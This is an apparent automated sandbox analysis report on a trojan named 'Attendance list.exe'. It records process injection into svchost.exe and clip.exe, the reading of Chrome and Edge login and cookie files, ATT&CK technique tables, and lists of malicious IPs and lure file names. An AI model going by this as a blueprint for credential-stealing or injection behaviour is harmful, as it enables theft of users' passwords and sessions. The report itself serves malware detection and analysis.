            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Users\user\Desktop\Attendance list.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Thread register set: target process: 2944
            Source: C:\Users\user\Desktop\Attendance list.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AA1008
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_00918C93 LogonUserW, 0_2_00918C93
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_008C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_008C3B4C
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_008C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_008C4A35
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_00924EC9 mouse_event, 0_2_00924EC9
            Source: C:\Users\user\Desktop\Attendance list.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Attendance list.exe"
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_009181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_009181F7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00924C03
            Source: Attendance list.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Attendance list.exe, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E886B cpuid 0_2_008E886B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008F50D7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00902230 GetUserNameW,0_2_00902230
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008F418A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008C4AFE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Attendance list.exe | Binary or memory string: WIN_81
            Source: Attendance list.exe | Binary or memory string: WIN_XP
            Source: Attendance list.exe | Binary or memory string: WIN_XPe
            Source: Attendance list.exe | Binary or memory string: WIN_VISTA
            Source: Attendance list.exe | Binary or memory string: WIN_7
            Source: Attendance list.exe | Binary or memory string: WIN_8
            Source: Attendance list.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Attendance list.exe | Code function: 0_2_00936596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00936596
            Source: C:\Users\user\Desktop\Attendance list.exe | Code function: 0_2_00936A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00936A5A
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 312 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph: ID 1465846, Sample: Attendance list.exe, Startdate: 02/07/2024, Architecture: WINDOWS, Score: 100. Process chain shown: Attendance list.exe -> svchost.exe -> sSzWYtHqcRqHklFYcPzKpLlSXP.exe (injected) -> clip.exe -> firefox.exe]

            Source | Detection | Scanner | Label | Link
            Attendance list.exe | 50% | ReversingLabs | Win32.Trojan.Autoit |
            Attendance list.exe | 40% | Virustotal | | Browse
            Attendance list.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1465846
                  Start date and time: 2024-07-02 07:14:04 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 10m 11s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed: 8
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: Attendance list.exe
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winEXE@7/5@14/12
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 92%
                  • Number of executed functions: 57
                  • Number of non-executed functions: 269
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  01:15:44 | API Interceptor | 12013594x Sleep call for process: clip.exe modified
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      www.xn--matfrmn-jxa4m.seNavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.86
                      SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      New Order.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      GcwoApxt8q.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Doc PI.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.86
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      DOMAINTECHNIKATNavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      DOC_6653.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.111
                      CLOUDFLARENETUShttps://guardianesdelbosque.orgGet hashmaliciousUnknownBrowse
                      • 104.22.50.131
                      mirai.mips.elfGet hashmaliciousMiraiBrowse
                      • 162.159.162.231
                      mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 1.2.57.176
                      https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1Get hashmaliciousUnknownBrowse
                      • 104.21.82.77
                      https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.151.101
                      https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpgGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      [EXTERNAL] Action Required_ ACH Remittance Review AbrholdingsGet hashmaliciousUnknownBrowse
                      • 172.67.179.83
                      http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.ioGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      Details.exeGet hashmaliciousSnake KeyloggerBrowse
                      • 188.114.96.3
                      https://f8dde4bf9.skcrr.com/s/bb134f99?b3c4b4af7cc5=c3UuY2FpQHJvcy5jb20=Get hashmaliciousUnknownBrowse
                      • 104.21.16.234
                      VPSQUANUSAWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                      • 198.44.170.208
                      Rn1AkuRExh.elfGet hashmaliciousMiraiBrowse
                      • 103.252.20.91
                      c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                      • 198.44.190.49
                      tpwinprn.dllGet hashmaliciousGhostRatBrowse
                      • 156.235.99.47
                      6z70AuHrHI.dllGet hashmaliciousUnknownBrowse
                      • 156.235.99.47
                      PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                      • 156.235.111.63
                      2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 23.251.54.212
                      Liquidacion por Factorizacion de Creditos.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 107.151.241.58
                      Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      PROVIDERBOXIPv4IPv6DUS1DE62c.jsGet hashmaliciousUnknownBrowse
                      • 5.44.111.28
                      62c.jsGet hashmaliciousUnknownBrowse
                      • 5.44.111.28
                      z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                      • 5.44.111.104
                      JJUmnnkIxSCyKik.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 93.90.186.43
                      De0RycaUHH.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                      • 5.44.111.109
                      27i42a6Qag.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                      • 128.127.69.76
                      Wp2jiU6tOK.elfGet hashmaliciousMiraiBrowse
                      • 5.44.126.213
                      tSPx13a2fq.elfGet hashmaliciousMirai, MoobotBrowse
                      • 5.44.126.228
                      Product_Inquiry_#03_2023.exeGet hashmaliciousUnknownBrowse
                      • 5.44.111.13
                      Advanced_Payment_Copy.exeGet hashmaliciousUnknownBrowse
                      • 5.44.111.13
                      LOOPIASENavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.86
